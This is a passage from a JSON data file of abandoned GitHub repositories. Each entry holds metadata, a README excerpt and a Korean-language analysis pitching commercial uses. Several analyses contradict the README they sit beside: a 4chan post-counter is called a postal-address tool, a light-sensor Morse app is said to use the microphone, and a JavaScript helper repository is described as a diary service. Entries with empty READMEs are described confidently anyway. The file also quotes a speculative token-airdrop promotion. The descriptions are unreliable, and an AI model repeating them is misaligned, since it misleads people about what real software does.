운영되거나 팀 내부용 도구로 활용 가능성이","readme_excerpt":"# RUTM -  RAM UP THE MOON\n\nEOS CPU rental price increased 30 times after EOS CPU mining!\n\nEOS ram is too cheap and should be more valuable!\n\nAt present, the EOS RAM pool has 4.46 million EOS(72G RAM), including B1 3.3 million (now shrunk to 2.34 million) 32G, 10.3G (750,000) has been used, B1 + 10.3G has been used = 3.1 million EOS, there are only 1.36 million EOS in the pool, most of holder are wallets and project owners, and hardcore holders such as wangruixiwww, have no speculation. The 10th holder is only 30,000 EOS.\n\nRUTM token is live on EOS chain through EOS RAM mining.\n\n80 million of the 100 million RUTM tokens will be airdropped for free, until all tokens are airdropped.\n\nFlow the ram in your account. Maximize the value of RAM.\n\nLet us use EOS RAM to mining, and let EOS RAM up moon.\n\n### Contract address\n\nThe token contract will be based on EOS address **ramupthemoon** \n\nblock explorer address: https://bloks.io/account/ramupthemoon   \ngithub address: https://github.com/baromjo","composite_score":0.3002,"license_safety_tag":"unknown"},{"name":"meilix/meilix-web","github_url":"https://github.com/meilix/meilix-web","stars":11,"language":"","license":"unknown","abandonment_months":103,"description":"# meilix-web 상용화 분석\n\n## 왜 보물인가\nLinux 기반의 가볍고 빠른 운영체제를 웹에서 직접 만들고 공유할 수 있는 도구로, 기술자가 아닌 일반인도 자신의 컴퓨터를 쉽게 커스터마이징할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 학교/회사에서 학생/직원용 통일된 컴퓨터 환경을 웹에서 만들어 배포하는 교육/기업 관","readme_excerpt":"","composite_score":0.3002,"license_safety_tag":"unknown"},{"name":"meilix/meilix-connect","github_url":"https://github.com/meilix/meilix-connect","stars":11,"language":"","license":"unknown","abandonment_months":103,"description":"# meilix-connect 기술 자산 분석\n\n## 왜 보물인가\nLinux 운영체제 사용자들이 다양한 서비스에 쉽게 접속할 수 있도록 만든 연결 도구로, 기술 초보자도 복잡한 설정 없이 인터넷 서비스를 활용할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n\n1. **기업 IT 관리 SaaS**: 회사의 직원들이 사용하는 여러 온라인 도구(이메일, 클라우드","readme_excerpt":"","composite_score":0.3002,"license_safety_tag":"unknown"},{"name":"SangShaoYe/Front-end-interview","github_url":"https://github.com/SangShaoYe/Front-end-interview","stars":5,"language":"","license":"unknown","abandonment_months":68,"description":"# SangShaoYe/Front-end-interview 분석\n\n## 왜 보물인가\n웹사이트 개발자가 취업 면접에서 자주 나오는 질문들을 정리한 학습 자료로, 개발자 교육 시장에서 꾸준한 수요가 있습니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼**: 개발자 면접 준비 과정을 유료 구독 강좌로 판매\n2. **기업 인사팀 도구**: 신입 개발자","readme_excerpt":"转载请注明出处: [https://github.com/qiu-deqing/FE-interview](https://github.com/qiu-deqing/FE-interview)\n\n<!-- START doctoc generated TOC please keep comment here to allow auto update -->\n<!-- DON'T EDIT THIS SECTION, INSTEAD RE-RUN doctoc TO UPDATE -->\n**Table of Contents**  *generated with [DocToc](http://doctoc.herokuapp.com/)*\n\n- [FE-interview](#fe-interview)\n  - [$HTML， HTTP，web综合问题](#$html，-http，web综合问题)\n    - [常见排序算法的时间复杂度,空间复杂度](#常见排序算法的时间复杂度空间复杂度)\n    - [前端需要注意哪些SEO](#前端需要注意哪些seo)\n    - [web开发中会话跟踪的方法有哪些](#web开发中会话跟踪的方法有哪些)\n    - [`<img>`的`title`和`alt`有什么区别](#img的title和alt有什么区别)\n    - [doctype是什么,举例常见doctype及特点](#doctype是什么举例常见doctype及特点)\n    - [HTML全局属性(global attribute)有哪些](#html全局属性global-attribute有哪些)\n    - [什么是web语义化,有什么好处](#什么是web语义化有什么好处)\n    - [HTTP method](#http-method)\n    - [从浏览器地址栏输入url到显示页面的步骤(以HTTP为例)](#从浏览器地址栏输入url到显示页面的步骤以http为例)\n    - [HTTP request报文结构是怎样的](#http-request报文结构是怎样的)\n    - [HTTP response报文结构是怎样的](#http-response报文结构是怎样的)\n    - [如何进行网站性能优化](#如何进行网站性能优化)\n  ","composite_score":0.3002,"license_safety_tag":"unknown"},{"name":"OnebugIS/vue-leparject","github_url":"https://github.com/OnebugIS/vue-leparject","stars":7,"language":"HTML","license":"unknown","abandonment_months":104,"description":"# vue-leparject 분석 보고서\n\n## 왜 보물인가\n웹사이트 제작을 쉽게 만들어주는 Vue 프레임워크 기반 도구로, 코딩 초보자도 드래그앤드롭으로 웹페이지를 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **웹사이트 빌더 SaaS**: 중소 창업자들이 쉽게 자신의 포트폴리오나 소개 사이트를 만들 수 있는 월 구독형 서비스\n2. **기업 내부 ","readme_excerpt":"# vue-leparject\n基于vue模拟的http://m.1c10.cn/\n","composite_score":0.3002,"license_safety_tag":"unknown"},{"name":"zamhown/MorseCodeReceiver-UWP","github_url":"https://github.com/zamhown/MorseCodeReceiver-UWP","stars":5,"language":"C#","license":"unknown","abandonment_months":103,"description":"# MorseCodeReceiver-UWP 보물 분석\n\n## 왜 보물인가\n스마트폰의 마이크를 이용해 모스 부호 신호를 자동으로 인식하고 텍스트로 변환해주는 니치 기술로, 시각장애인 통신이나 레토로 취미 시장에서 독점적 가치를 가집니다.\n\n## 어디에 쓸 수 있나\n1. **통신 보조 앱 SaaS**: 시각장애인을 위한 모스 부호 입력 서비스를 월 구독으로 제","readme_excerpt":"# MorseCodeReceiver-UWP\nAn UWP app which can translate the light sensor data into Morse code on mobile device.</br>\nClick [here](https://www.zhihu.com/question/63387608/answer/268691100)(from Zhihu) to get more infomation.\n","composite_score":0.3002,"license_safety_tag":"unknown"},{"name":"libredesktop/libredesktop-events","github_url":"https://github.com/libredesktop/libredesktop-events","stars":11,"language":"","license":"unknown","abandonment_months":103,"description":"# libredesktop/libredesktop-events 분석\n\n## 왜 보물인가\n데스크톱 환경에서 행사나 일정을 관리하는 오픈소스 도구로, 누구나 자유롭게 수정하고 활용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 회사 일정관리 웹사이트에 이 기술을 통합하여 직원들이 더 쉽게 행사를 예약하고 추적할 수 있는 서비스\n2.","readme_excerpt":"","composite_score":0.3002,"license_safety_tag":"unknown"},{"name":"Kreijstal/Logs-and-Memories","github_url":"https://github.com/Kreijstal/Logs-and-Memories","stars":11,"language":"","license":"unknown","abandonment_months":104,"description":"# Kreijstal/Logs-and-Memories 분석\n\n## 왜 보물인가\n개인의 일상, 추억, 생각을 체계적으로 기록하고 관리할 수 있는 도구로, 디지털 시대의 개인 역사 관리 솔루션입니다.\n\n## 어디에 쓸 수 있나\n\n1. **개인 일기/추억 관리 SaaS**: 구독자가 매일의 일상을 사진, 글, 위치 정보와 함께 저장하는 클라우드 서비스\n2. **","readme_excerpt":"hello \n<a href=\"data:text/plain;charset=utf-8;base64,PGJvZHk+DQpOaWNlLCBub3cgdGhhdCB5b3UncmUgaGVyZSBwbGVhc2UgY29weSBwYXN0ZSB0aGlzDQoNCjxwcmU+DQpibGFibHNibHNibHNhYmxhYmxhDQo8L3ByZT4NCjwvYm9keT4=\">:p</a>\n```\n//Usage:\n/*\nCreate Element:\n$Rainb.el('div',{'attribute':\"value\",style:{\"color\":\"red\"}},[ (childnodes) ])\nbecomes:  <div attribute=\"value\" style=\"color: red;\"></div>\nAppend Element\n$Rainb.add(element,elementToAppend)\nGet Element By Id\n$Rainb.id(id);\nCreate TextNode\n$Rainb.tn(text);\nCreate a RainbNode (an element wrapper)\n$Rainb.node(elem);\nYou can modify RainbNode attributes and children and it will not affect DOM until you call .render\nParameter is boolean, true for rendering children, false for not rendering children\n$Rainb.node.render(boolean);\n\n\n*/\n//This probably proves I've gotten better at programming.\n//DOM helper functions.\nvar genParser = (function(tys,tree,start) {\n\tvar source, index;\n\tvar treeRewrite = tree;\n\t\t//Apparently, you don't tokenize and then parse, you do it on ","composite_score":0.3002,"license_safety_tag":"unknown"},{"name":"Kreijstal/BitsetWrapper","github_url":"https://github.com/Kreijstal/BitsetWrapper","stars":9,"language":"JavaScript","license":"unknown","abandonment_months":144,"description":"# BitsetWrapper 프로젝트 평가\n\n## 왜 보물인가\n대량의 데이터를 매우 작은 용량으로 저장하고 빠르게 처리할 수 있는 도구로, 데이터 처리 비용을 대폭 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **대규모 사용자 추적 서비스**: 수백만 명의 사용자가 어떤 상품을 봤는지 추적하는 온라인 쇼핑몰 기능\n2. **내부 데이터 분석 도구**:","readme_excerpt":"BitsetWrapper\n=============\n\nA bit array wrapper over Uint8Array, edits bits, but is stored as a byte array.\nThe idea is that you use it as a bit array, you can also use it as a byte array of \"any\" type (until it reaaches max word size which for me is 53 bits)\nSo yeah you could convert bytes back and forth bases, Also since it's based in Uint8Array, It's typed, therefore it won't change length as easily.\nYou will have to concantenate it, it also has \"useful\" comments of why some thnigs exists, It's nice.\n\n","composite_score":0.3002,"license_safety_tag":"unknown"},{"name":"fossasia/jp.pslab.io","github_url":"https://github.com/fossasia/jp.pslab.io","stars":5,"language":"","license":"unknown","abandonment_months":92,"description":"# PSLab 일본 웹사이트 저장소 분석\n\n## 왜 보물인가\n과학 실험 장비를 저렴하게 만들어 학생들이 집에서도 물리/화학 실험을 할 수 있도록 돕는 프로젝트입니다.\n\n## 어디에 쓸 수 있나\n1. **교육용 SaaS**: 온라인 과학 교육 플랫폼이 이 장비를 번들 상품으로 판매\n2. **학교 내부 도구**: 중고등학교 과학 실험실이 저비용 장비로 수업 운","readme_excerpt":"## Pocket Science Lab ベアボーンボード\n\n試験および計測を行うための小型のオープンソースハードウェアです。様々なセンサによる拡張が容易で、AndroidアプリやLinuxデスクトップアプリケーションを用いて簡単に制御できます。\n\nオシロスコープやマルチメータ、シグナルジェネレータとして利用することが可能です。ソフトウェアが提供されているので、プログラミングは不要です。\n\n**[<a href=\"http://ssci.to/4103\">ここに注文する</a>]**\n\n### 特徴\n\n**オシロスコープ**\n\n本製品の主要機能のうちの一つに、最大2 Msps 4チャンネルのデジタルオシロスコープがあります。トリガー設定やゲイン選択といった制御ができます。\n\n**シグナルジェネレータ**\n\n*   SI1：5 Hz ～ 5 KHzの任意波形生成\n    *   +/-3 Vの範囲で振幅を手動制御\n*   SI2：5 Hz ～ 5 KHzの任意波形生成\n    *   +/-3 Vの振幅\n    *   ソフトウェアを介して減衰可能\n*   SQx：最大周波数32 MHz、デューティ比分解能15 ns、位相設定可能な4チャンネルPWM出力\n\n**測定機能**\n\n*   16 MHzまでを試験済みの周波数カウンタ\n*   pFからuFレンジの静電容量計測\n*   本製品には、ゲインを調整可能ないくつかの12 bit アナログ入力（電圧計としても機能）と、+/-5 mV～+/-16 Vで変動する最大範囲があります\n\n**DC電源**\n\n*   最大3.3 mAの12 bit固定電流源（負荷抵抗の影響を受けます）\n*   三つのプログラム可能な12 bit電圧源があります\n    *   +/-3.3 V、+/-5 V、0～3 V\n    *   制御：PV1、 PV2、 PV3\n\n**拡張制御**\n\n*   オシロスコープを用いた拡張制御\n*   データロガー\n*   ロジックアナライザ\n\n**その他**\n\n*   分解能15 nsの4 MHz、4チャンネルのロジックアナライザ。電圧/電流源。\n*   SPI、I<sup>2</sup>C、UART出力\n*   無線データ収集のための2.4 GHz送信機を別途搭載可能（ファームウェア準備中）\n    * ","composite_score":0.3002,"license_safety_tag":"unknown"},{"name":"kczarnota/similar_images_search_engine","github_url":"https://github.com/kczarnota/similar_images_search_engine","stars":5,"language":"C++","license":"unknown","abandonment_months":104,"description":"# 유사 이미지 검색 엔진 분석\n\n## 왜 보물인가\n사진이 많은 전자상거래 회사들이 \"이 상품과 비슷한 상품 찾기\" 기능을 쉽게 만들 수 있게 해주는 핵심 기술입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 온라인 쇼핑몰을 위한 \"유사 상품 추천 서비스\"를 월 구독으로 판매\n2. **내부 업무 도구**: 대형 이커머스 회사가 자사의 상품","readme_excerpt":"# Similar images search engine\nApplication measuring performance of state-of-art feature descriptors when combined together in different ways.\nIt uses Bag of Words approach to create a visual word dictionary and then perform search.\nDictionary creation and tests runs are executed on [Wang dataset](http://wang.ist.psu.edu/docs/related/). Used libraries: OpenCV, Boost, QT.\n\n## Requirements\n```bash\nsudo apt-get install cmake git libgtk2.0-dev pkg-config libavcodec-dev libavformat-dev libswscale-dev qtcreator qt5-default\n```\n\n### OpenCV\n```bash\ngit clone https://github.com/opencv/opencv.git\ngit clone https://github.com/opencv/opencv_contrib.git\ncd ~/opencv\nmkdir build\ncd build\ncmake -D CMAKE_BUILD_TYPE=Release -D CMAKE_INSTALL_PREFIX=/usr/local ..\ncmake -DOPENCV_EXTRA_MODULES_PATH=../../opencv_contrib/modules ..\nmake -j5\nsudo make install\n```\n\n### BOOST\n```bash\nsudo ./bootstrap.sh --prefix=/usr/local\nsudo ./b2 install\n```\n\n## Program compilation\n```bash\ngit clone https://github.com/kczarno","composite_score":0.3002,"license_safety_tag":"unknown"},{"name":"OpnTec/opntec-artwork","github_url":"https://github.com/OpnTec/opntec-artwork","stars":12,"language":"HTML","license":"unknown","abandonment_months":26,"description":"# OpnTec/opntec-artwork 저장소 분석\n\n## 왜 보물인가\n디자인 자산을 체계적으로 정리하고 관리하는 도구로, 기업들이 브랜드 이미지를 일관성 있게 유지하는 데 필수적입니다.\n\n## 어디에 쓸 수 있나\n- **디자인 자산 관리 서비스**: 중소 기업이 로고, 아이콘, 컬러 가이드를 한곳에서 관리하고 팀원들과 공유하는 온라인 플랫폼\n- **마","readme_excerpt":"# opntec-artwork\nOpnTec Artwork\n","composite_score":0.3002,"license_safety_tag":"unknown"},{"name":"ronal2do/AnimatedFrameSlideshow","github_url":"https://github.com/ronal2do/AnimatedFrameSlideshow","stars":7,"language":"JavaScript","license":"unknown","abandonment_months":41,"description":"# AnimatedFrameSlideshow 프로젝트 분석\n\n## 왜 보물인가\n사진이나 그림을 부드럽게 움직이는 쇼처럼 보여주는 기술로, 웹사이트나 앱의 시각적 매력을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 이미지 편집 플랫폼에서 \"자동 슬라이드쇼\" 기능으로 제공\n- **내부 업무 도구**: 마케팅팀의 광고 배너 자","readme_excerpt":"## Animated Frame Slideshow\n### Based in awesome work https://tympanus.net/Development/AnimatedFrameSlideshow/index6.html\n\n![Slider](/asset/slider.gif)","composite_score":0.3002,"license_safety_tag":"unknown"},{"name":"Kreijstal/CurrentPostNumber","github_url":"https://github.com/Kreijstal/CurrentPostNumber","stars":10,"language":"","license":"unknown","abandonment_months":166,"description":"# CurrentPostNumber 저장소 분석\n\n## 왜 보물인가\n우편번호나 주소 정보를 자동으로 관리해주는 도구로, 배송·택배·전자상거래 관련 업체들이 반복적인 데이터 입력 작업을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 온라인 쇼핑몰이 결제 시 고객 주소를 자동으로 검증하고 정정하는 기능\n- **내부 업무 도구*","readme_excerpt":"CurrentPostNumber\n=================\n\nGet's current post number for 4chan","composite_score":0.3002,"license_safety_tag":"unknown"},{"name":"libredesktop/libredesktop-project-list","github_url":"https://github.com/libredesktop/libredesktop-project-list","stars":11,"language":"","license":"unknown","abandonment_months":103,"description":"# LibreDesktop 프로젝트 리스트 평가\n\n## 왜 보물인가\n자유로운 오픈소스 데스크톱 환경을 구축하려는 사람들의 프로젝트 현황을 한눈에 볼 수 있는 지도 같은 자료입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 오픈소스 개발자 커뮤니티 플랫폼 (SaaS)**\n- 전 세계 기여자들이 진행 중인 프로젝트를 검색하고 참여할 수 있는 웹 서비스로 운영\n\n*","readme_excerpt":"","composite_score":0.3002,"license_safety_tag":"unknown"},{"name":"w568w/How-To-Ask-Questions-The-Smart-Way","github_url":"https://github.com/w568w/How-To-Ask-Questions-The-Smart-Way","stars":7,"language":"JavaScript","license":"unknown","abandonment_months":107,"description":"# How-To-Ask-Questions-The-Smart-Way 분석\n\n## 왜 보물인가\n좋은 질문을 하는 방법을 배우면 누구나 온라인에서 더 빠르게 문제를 해결할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **고객지원 교육 플랫폼**: 기업의 고객센터 직원들이 더 효율적으로 고객 문제를 처리하도록 교육하는 SaaS 서비스\n2. **내부 기술지원 시스","readme_excerpt":"#提问的智慧\n\n**How To Ask Questions The Smart Way**\n\nCopyright © 2001,2006,2014 Eric S. Raymond, Rick Moen\n\n本指南英文版版权为 Eric S. Raymond, Rick Moen 所有。\n\n原文网址:[http://www.catb.org/~esr/faqs/smart-questions.html](http://www.catb.org/~esr/faqs/smart-questions.html)\n\nCopyleft 2001 by D.H.Grand(nOBODY/Ginux), 2010 by Gasolin, 2015 by Ryan Wu\n\n本中文指南是基于原文 3.10 版以及 2010 年由 [Gasolin](https://github.com/gasolin) 所翻译版本的最新翻译；\n\n您所阅读的指南由 [w568w](https://github.com/w568w)进行了删改和精简。版权归原作者所有。\n\n协助指出翻译问题，__请[发Issue](https://github.com/w568w/How-To-Ask-Questions-The-Smart-Way/issues/new)，或直接[发Pull Request](https://github.com/w568w/How-To-Ask-Questions-The-Smart-Way/compare/)给我。__\n\n## [原文版本历史](https://github.com/ryanhanwu/smartquestions/blob/master/history.md)\n\n##目录\n  * [声明](#声明)\n  * [简介](#简介)\n  * [在提问之前](#在提问之前)\n  * [当你提问时](#当你提问时)\n    * [慎选提问的论坛](#慎选提问的论坛)\n    * [Stack Overflow](#stack-overflow)\n    * [网站和IRC论坛](#网站和irc论坛)\n    * [第二步，使用项目邮件列表](#第二步使用项目邮件列表)\n    * [使用有意义且描述明确的标题](#使用有意义且描述明确的标题)\n    * [使问题容易回复](#使","composite_score":0.3002,"license_safety_tag":"unknown"},{"name":"ArchibaldOS/ParkNShop","github_url":"https://github.com/ArchibaldOS/ParkNShop","stars":5,"language":"CSS","license":"unknown","abandonment_months":86,"description":"# ParkNShop 저장소 분석\n\n## 왜 보물인가\n주차장 예약과 쇼핑을 한 번에 해결하는 통합 플랫폼으로, 도시 소비자들의 가장 큰 불편함(주차 찾기)을 직접 해결합니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 상점가/쇼핑몰이 구독해서 고객 편의성을 높이고 방문객을 늘리는 월 구독형 플랫폼\n2. **내부 업무 도구**: 대형 마트/백화","readme_excerpt":"The PARKnSHOP.com Online Mall application enables vendors to set up online shops, customers to browse through the shops, and a system administrator to approve and reject requests for new shops and maintain lists of shop categories.\n\nAlso on the agenda is designing an online shopping site in English to manage the items in the shop and also help customers purchase them online without having to visit the shop physically.\n\nPARKnSHOP.com Online Mall  will use the internet as the sole method for selling goods to its consumers. The consumer will be in complete control of his/her shopping experience. Shopping will be highly personalized and the mall will provide lower prices than most competitors. This, in brief, is a description of our product which will showcase a complete shopping experience in a small package.\n\n\n","composite_score":0.3002,"license_safety_tag":"unknown"},{"name":"ffii/ffii.de","github_url":"https://github.com/ffii/ffii.de","stars":11,"language":"HTML","license":"unknown","abandonment_months":69,"description":"# ffii.de 저장소 분석\n\n## 왜 보물인가\n유럽의 소프트웨어 특허 정책에 대한 공식 입장을 담은 신뢰성 높은 정보 자산으로, 기술 정책 관련 커뮤니케이션 도구로 활용 가능합니다.\n\n## 어디에 쓸 수 있나\n1. **정책 분석 플랫폼**: 유럽 기업들을 위한 지식재산권 컨설팅 SaaS 기반 콘텐츠로 활용\n2. **내부 교육 도구**: 법무팀·개발팀을 ","readme_excerpt":"","composite_score":0.3002,"license_safety_tag":"unknown"},{"name":"fightinjoe/restful-authentication","github_url":"https://github.com/fightinjoe/restful-authentication","stars":7,"language":"Ruby","license":"unknown","abandonment_months":221,"description":"# fightinjoe/restful-authentication 평가 보고서\n\n## 왜 보물인가\n웹 서비스에서 사용자가 안전하게 로그인하고 권한을 관리하는 핵심 기술을 미리 만들어 제공하므로, 비슷한 기능이 필요한 많은 회사들이 처음부터 직접 개발하는 수고를 덜 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 여러 고객사를 관리하는 ","readme_excerpt":"Restful Authentication Generator\n====\n\nThis is a basic restful authentication generator for rails, taken \nfrom acts as authenticated.  Currently it requires Rails 1.2.6 or above.\n\nTo use:\n\n  ./script/generate authenticated user sessions \\\n\t\t--include-activation \\\n\t\t--stateful\n\nThe first parameter specifies the model that gets created in signup\n(typically a user or account model).  A model with migration is \ncreated, as well as a basic controller with the create method.\n\nThe second parameter specifies the sessions controller name.  This is\nthe controller that handles the actual login/logout function on the \nsite.\n\nThe third parameter (--include-activation) generates the code for a \nActionMailer and its respective Activation Code through email.\n\nThe fourth (--stateful) builds in support for acts_as_state_machine\nand generates activation code.  This was taken from:\n\nhttp://www.vaporbase.com/postings/stateful_authentication\n\nYou can pass --skip-migration to skip the user migration.\n\nIf you","composite_score":0.3002,"license_safety_tag":"unknown"},{"name":"meilix/arch-meilix","github_url":"https://github.com/meilix/arch-meilix","stars":11,"language":"","license":"unknown","abandonment_months":103,"description":"# Arch-Meilix 저장소 분석\n\n## 왜 보물인가\n맞춤형 리눅스 운영체제를 누구나 쉽게 만들 수 있는 도구로, 자신의 컴퓨터를 원하는 대로 최적화하려는 사람들에게 강력한 솔루션입니다.\n\n## 어디에 쓸 수 있나\n- **맞춤 운영체제 SaaS**: 기업이 자신의 요구에 맞게 설계된 리눅스 시스템을 웹 인터페이스에서 주문 제작하는 서비스\n- **학교/교","readme_excerpt":"","composite_score":0.3002,"license_safety_tag":"unknown"},{"name":"jersey/jersey","github_url":"https://github.com/jersey/jersey","stars":6,"language":"","license":"unknown","abandonment_months":65,"description":"# Jersey 저장소 평가\n\n## 왜 보물인가\n웹 서비스를 빠르게 만들 수 있도록 돕는 오픈소스 도구로, 개발자들이 복잡한 작업을 간단하게 처리할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 기업용 데이터 관리 플랫폼의 백엔드 시스템 구축\n- **내부 업무 도구**: 직원들이 사용하는 회사 업무 자동화 시스템 개발\n- **A","readme_excerpt":"<!--\n\n    DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS HEADER.\n\n    Copyright (c) 2012-2021 Oracle and/or its affiliates. All rights reserved.\n\n    The contents of this file are subject to the terms of either the GNU\n    General Public License Version 2 only (\"GPL\") or the Common Development\n    and Distribution License(\"CDDL\") (collectively, the \"License\").  You\n    may not use this file except in compliance with the License.  You can\n    obtain a copy of the License at\n    https://oss.oracle.com/licenses/CDDL+GPL-1.1\n    or LICENSE.txt.  See the License for the specific\n    language governing permissions and limitations under the License.\n\n    When distributing the software, include this License Header Notice in each\n    file and include the License file at LICENSE.txt.\n\n    GPL Classpath Exception:\n    Oracle designates this particular file as subject to the \"Classpath\"\n    exception as provided by Oracle in the GPL Version 2 section of the License\n    file that accompanied this","composite_score":0.3002,"license_safety_tag":"unknown"},{"name":"libredesktop/libredesktop-artwork","github_url":"https://github.com/libredesktop/libredesktop-artwork","stars":11,"language":"","license":"unknown","abandonment_months":102,"description":"# LibreDesktop 아트워크 저장소 분석\n\n## 왜 보물인가\n오픈소스 데스크톱 프로그램의 시각적 디자인 자산을 모아놓은 재사용 가능한 디자인 라이브러리입니다.\n\n## 어디에 쓸 수 있나\n1. **디자인 에이전시의 SaaS 플랫폼**: 클라이언트가 오픈소스 디자인 요소를 커스터마이징하여 자신의 애플리케이션에 적용하는 웹 서비스\n2. **기업 내부 UI","readme_excerpt":"# lubuntu-artwork\nlubuntu-artwork\n","composite_score":0.3002,"license_safety_tag":"unknown"},{"name":"meilix/meilix-libraries","github_url":"https://github.com/meilix/meilix-libraries","stars":11,"language":"","license":"unknown","abandonment_months":103,"description":"# meilix-libraries 상용화 분석\n\n## 왜 보물인가\n다양한 소프트웨어 개발 도구들을 한 곳에서 모아 관리할 수 있는 라이브러리 모음으로, 개발자들의 작업 시간을 단축시킬 수 있는 기초 자산입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 개발자용 SaaS 플랫폼**\n- 이 라이브러리들을 클라우드 기반 개발 환경으로 패키징하여 개발자들이 웹에서 바","readme_excerpt":"# meilix-libraries","composite_score":0.3002,"license_safety_tag":"unknown"},{"name":"meilix/deb-meilix","github_url":"https://github.com/meilix/deb-meilix","stars":11,"language":"","license":"unknown","abandonment_months":103,"description":"# meilix/deb-meilix 분석 보고서\n\n## 왜 보물인가\n오래된 프로젝트(2017년)로 현재 활발히 유지되지 않아, 새로운 팀이 현대화하여 재출시하면 숨겨진 가치를 발굴할 수 있는 기회입니다.\n\n## 어디에 쓸 수 있나\n1. **개발자 도구 SaaS**: 리눅스 패키지 빌드 자동화 플랫폼으로 개발자 팀에 구독료 청구\n2. **기업 내부 도구**:","readme_excerpt":"","composite_score":0.3002,"license_safety_tag":"unknown"},{"name":"missxiaolin/vue-admin","github_url":"https://github.com/missxiaolin/vue-admin","stars":5,"language":"JavaScript","license":"unknown","abandonment_months":80,"description":"# Vue Admin 저장소 분석\n\n## 왜 보물인가\n웹사이트 관리자 화면을 쉽게 만들 수 있는 기본 틀을 제공해 개발 시간을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 고객사 데이터를 관리하는 대시보드 화면 구축\n- **내부 업무 도구**: 회사 직원들이 사용하는 직원 관리, 매출 통계 시스템\n- **API 판매**","readme_excerpt":"# admin\n\n> A Vue.js project\n\n## Build Setup\n\n``` bash\n# install dependencies\nnpm install\n\n# serve with hot reload at localhost:8080\nnpm run dev\n\n# build for production with minification\nnpm run build\n\n# build for production and view the bundle analyzer report\nnpm run build --report\n\n# run unit tests\nnpm run unit\n\n# run e2e tests\nnpm run e2e\n\n# run all tests\nnpm test\n```\n\nFor a detailed explanation on how things work, check out the [guide](http://vuejs-templates.github.io/webpack/) and [docs for vue-loader](http://vuejs.github.io/vue-loader).\n# vue-admin\n\n```\nbuild/\t\t\t\t\t\t配置文件\nconfig/\t\t\t\t\t\t配置文件\ndist\t\t\t\t\t\t打包目录\nsrc\t\t\t\t\t\t\t\n\tapi\t\t\t\t\t\tapi\n\tassets\t\t\t\t\t资源文件\n\tcommon\t\t\t\t\t资源文件\n\t\t\tcss\n\t\t\tfont\n\t\t\timage\n\t\t\tjs\n\tcomponents\t\t\t\tview\n\troute\t\t\t\t\t路由\n\tstore\t\t\t\t\tvuex配置\nstatic\ntest\n```\n\n### 接口返回参数定义\n\n~~~\n{\n\t\"data\": []\n\t\"code\": 0,\n\t\"message\": \"\",\n\t\"time\": \"1512112715\",\n\t\"_ut\": \"0.02982\"\n}\n~~~\n\n~~~\n{\n\t\"code\": 1000,\n\t\"message\": \"token非法\",\n\t\"time\": \"1512112715\",\n\t\"_ut\": \"0.02982\"\n}\n~~~\n\n### vue各种自定义组件库\n\n- [组件提取库](","composite_score":0.3002,"license_safety_tag":"unknown"},{"name":"blurfx/no-comment","github_url":"https://github.com/blurfx/no-comment","stars":9,"language":"","license":"unknown","abandonment_months":79,"description":"","readme_excerpt":"# No-Comment\n\nBlock filter for user comments on Korean sites. \n\n## Usage\n\n```\nhttps://github.com/blurfx/no-comment/raw/master/no-comment.txt\n```\n\n### Adblock Plus ([Subscribe][])\n\n\n### uBlock Origin ([Subscribe][])\n\n\n### AdGuard ([Subscribe][])\n\n\n[Subscribe]: https://subscribe.adblockplus.org/?location=https://github.com/blurfx/no-comment/raw/master/no-comment.txt&title=NoComment\n\n\n## Lists\n- MLBPARK\n- YouTube\n- 개드립넷\n- 네이버(블로그, 포스트, 뉴스, 웹툰)\n- 네이트(뉴스)\n- 다음(1분, 뉴스)\n- 더쿠\n- 루리웹\n- 에펨코리아\n- 인벤\n- 인스티즈\n- 클리앙","composite_score":0.3002,"license_safety_tag":"unknown"},{"name":"ClockGet/RemoteDesktopManage","github_url":"https://github.com/ClockGet/RemoteDesktopManage","stars":8,"language":"C#","license":"WTFPL","abandonment_months":106,"description":"# ClockGet/RemoteDesktopManage 상용화 분석\n\n## 왜 보물인가\n원격으로 다른 사람의 컴퓨터를 조종할 수 있는 도구로, IT 지원팀이나 온라인 교육 강사들이 실제로 필요로 하는 실용적인 솔루션입니다.\n\n## 어디에 쓸 수 있나\n1. **IT 기업 지원 서비스**: 고객사 직원의 컴퓨터에 원격 접속해 문제를 해결하고 월 구독료 징수\n2","readme_excerpt":"\n感谢原作者的无私奉献，只在原作者大量工作的基础上进行了一些小的改动。\n\n1.RdpClient默认大小为屏幕的大小，并设置RdpClient为自动调整大小\n![image](https://github.com/ClockGet/RemoteDesktopManage/blob/master/3.png)\n\n2.TabControl设置为可拖动，并仿照QQ聊天框（当然没仿到精髓）拖动时增加界面的截图动画\n![image](https://github.com/ClockGet/RemoteDesktopManage/blob/master/4.png)\n\n3.拖动后如果鼠标坐标在TabControl的标签区域范围内，则交换两个标签位置，否则生成一个新的独立窗口\n\n4.独立窗口左上角图标点击后能重新附加到主窗口的TabControl中\n","composite_score":0.3002,"license_safety_tag":"safe"},{"name":"OnebugIS/-vue","github_url":"https://github.com/OnebugIS/-vue","stars":8,"language":"HTML","license":"unknown","abandonment_months":104,"description":"# OnebugIS/-vue 프로젝트 분석\n\n## 왜 보물인가\n웹 애플리케이션을 빠르게 만들 수 있는 기초 틀(프레임워크)로, 개발자들이 처음부터 다시 코드를 작성하는 수고를 덜어줍니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 중소기업을 위한 간단한 프로젝트 관리 웹 서비스로 제공\n2. **내부 업무 도구**: 회사의 직원 근무 기록이나 ","readme_excerpt":"# vuewebpack\n\n> A Vue.js project\n\n## Build Setup\n\n``` bash\n# install 